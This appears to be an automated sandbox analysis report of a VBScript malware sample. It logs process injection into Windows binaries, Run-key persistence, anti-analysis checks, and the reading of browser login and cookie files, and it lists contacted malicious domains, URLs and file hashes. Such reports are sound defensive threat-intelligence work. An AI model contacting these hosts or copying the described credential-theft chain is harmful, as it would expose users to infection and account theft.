Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_084E2AF3 push ebx; ret	5_2_084E2B32
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 12_2_246C09AD push ecx; mov dword ptr [esp], ecx	12_2_246C09B6
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C2528 push ss; retf	16_2_058C2557
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C94A4 push edx; ret	16_2_058C94A5
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058BC7B2 push edi; ret	16_2_058BC7B3
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C2F5C pushad ; retf	16_2_058C2F77
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C2EF6 pushad ; retf	16_2_058C2F77
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C2E10 push ecx; iretd	16_2_058C2EBA
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058BC1B4 push ecx; iretd	16_2_058BC1B5
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C294B push edx; iretd	16_2_058C2952
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C4974 push ds; retn 03BDh	16_2_058C497A
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058CE00D push 54F79CCFh; retf	16_2_058CE012
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B7809 pushad ; ret	16_2_058B7836
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B33B0 push edx; retf	16_2_058B33B2
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B7BCD push edx; retf	16_2_058B7BCE
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C931D push edi; ret	16_2_058C932D
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B2321 push edi; ret	16_2_058B2331
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C8B4D push edi; retf	16_2_058C8B5C
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C8B50 push edi; retf	16_2_058C8B5C
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B22F6 push edi; ret	16_2_058B2331
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058C324B push ebx; ret	16_2_058C325B
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Code function: 16_2_058B226C push edx; iretd	16_2_058B226D

Source: C:\Windows\SysWOW64\replace.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YDN4C			Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YDN4C			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4487	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5386	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8424	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1321	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 8424 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep count: 1321 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\replace.exe	Last function: Thread delayed

Source: wscript.exe, 00000000.00000003.1312114499.000001AAA32F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\ig
Source: wab.exe, 0000000C.00000003.2155735479.0000000008A0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.2359893291.000002B3501AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtProtectVirtualMemory: Direct from: 0x77542F9C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtSetInformationProcess: Direct from: 0x77542C5C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtOpenKeyEx: Direct from: 0x77542B9C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtCreateFile: Direct from: 0x77542FEC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtOpenFile: Direct from: 0x77542DCC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtQueryInformationToken: Direct from: 0x77542CAC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtDeviceIoControlFile: Direct from: 0x77542AEC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtAllocateVirtualMemory: Direct from: 0x77542BEC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtQueryVolumeInformationFile: Direct from: 0x77542F2C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtOpenSection: Direct from: 0x77542E0C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtAllocateVirtualMemory: Direct from: 0x775448EC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtSetInformationThread: Direct from: 0x775363F9	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtQuerySystemInformation: Direct from: 0x775448CC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtReadVirtualMemory: Direct from: 0x77542E8C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtCreateKey: Direct from: 0x77542C6C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtSetInformationThread: Direct from: 0x77542B4C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtQueryAttributesFile: Direct from: 0x77542E6C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtAllocateVirtualMemory: Direct from: 0x77543C9C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtCreateUserProcess: Direct from: 0x7754371C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtQueryInformationProcess: Direct from: 0x77542C26	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtResumeThread: Direct from: 0x77542FBC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtWriteVirtualMemory: Direct from: 0x7754490C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtDelayExecution: Direct from: 0x77542DDC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtAllocateVirtualMemory: Direct from: 0x77542BFC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtReadFile: Direct from: 0x77542ADC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtQuerySystemInformation: Direct from: 0x77542DFC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtResumeThread: Direct from: 0x775436AC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtNotifyChangeKey: Direct from: 0x77543C2C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtCreateMutant: Direct from: 0x775435CC	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtWriteVirtualMemory: Direct from: 0x77542E3C	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	NtMapViewOfSection: Direct from: 0x77542D1C	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe	Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Windows Analysis Report 1000901 LIQUIDACION.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
1000901 LIQUIDACION.vbs

Malware Threat Intel
Provided by

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2CEF9C0			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.253.78	webwheelsmedia.com	United States	46606	UNIFIEDLAYER-AS-1US	false
195.24.68.5	www.dhleba51.ru	Russian Federation	48287	RU-CENTERRU	false
142.251.2.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
142.250.101.100	drive.google.com	United States	15169	GOOGLEUS	false

Name	IP	Active
webwheelsmedia.com	162.241.253.78	true
www.dhleba51.ru	195.24.68.5	true
drive.google.com	142.250.101.100	true
drive.usercontent.google.com	142.251.2.132	true
www.webwheelsmedia.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY	false	Avira URL Cloud: safe	unknown
http://www.dhleba51.ru/im2z/	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown

ID:	1430770
Product:	CloudBasic
Start time:	07:02:11
Start date:	24.04.2024
Sample:	1000901 LIQUIDACION.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	14ac5b0600701be4d0ed3990a64efce4
SHA1:	45778f2240e082952eb68ec11885ccee168498de
SHA256:	598ef0ef2670ff8f0dfa5f9849e1723a8a4c20e470a23b6b67d72db9e9146007
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a53lwhhr.jni.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzq41opo.35o.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfphdkba.zfv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no41w1de.rju.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\yF672G	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	C1AE02DC8BFF5DD65491BF71C0B740A7	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
C:\Users\user\AppData\Roaming\Medikamentel.Ddg	ASCII text, with very long lines (65536), with no line terminators	B3B2AC793EF703D0D9BFBE6ED03FF37B	A04C56371FF86CF64BEE38CB9CEA5B093860A73A	7CB59FA65DA4CF4C5E46C7FFBEF92A03BCE2248522AD6EA7534BB9FC2FFFC97D